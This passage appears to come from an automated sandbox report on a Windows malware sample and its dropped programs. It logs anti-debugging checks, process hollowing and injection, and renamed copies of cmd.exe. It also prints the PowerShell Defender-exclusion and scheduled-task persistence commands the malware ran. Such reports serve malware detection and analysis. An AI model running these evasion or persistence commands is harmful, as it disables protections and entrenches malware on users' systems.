Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02E65908

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99824	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99708	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99589	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99478	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99166	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98927	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98725	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98603	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98368	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98260	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97989	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97846	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97496	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97382	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97274	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97160	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97035	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96772	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96646	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96059	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95943	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95818	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95693	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95568	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95443	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95318	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95055	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94941	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94818	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94696	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94582	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94459	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94334	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94209	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94084	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93960	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99725	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99616	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99505	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99382	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99261	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99148	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99039	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98907	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98803	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99349
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99157
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98758
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98649
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98377
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98238
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97963
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97713
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97479
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97335
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97079
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96552
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96152
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96008
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95868
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95747
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95592
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95416
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95272
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95135
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95030
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94898
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94777
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94473
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94153
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99790
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99586
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99183
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99076
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98962
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98850
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98723
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98182
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98071
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97964
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97854
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97743
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97524
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97307
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97197
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97087
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96979
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96759
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96650
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96540
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96432
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96323
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96213
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96103
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95994
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95881
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95761
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95519
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95386
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99886
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99771
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99632
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99517
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99376
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98832
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98583
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97833
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97583
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96833
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96560
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96451
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96297
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96189
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93916
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93660
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93536
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93411
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93286
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC
Source: neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 00000016.00000002.2308974209.00000000005B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

API call chain: ExitProcess graph end node

graph_0-32436

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E7F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02E7F744

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02E7894C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 8_1_004015D7 SetUnhandledExceptionFilter,	8_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 8_1_004015D7 SetUnhandledExceptionFilter,	8_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 23_1_004015D7 SetUnhandledExceptionFilter,	23_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 23_1_004015D7 SetUnhandledExceptionFilter,	23_1_004015D7

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Windows\SysWOW64\timeout.exe base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3B2008	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3CC008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3E8008

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02E65ACC
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: GetLocaleInfoA,	0_2_02E6A7C4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02E65BD8
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: GetLocaleInfoA,	0_2_02E6A810

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
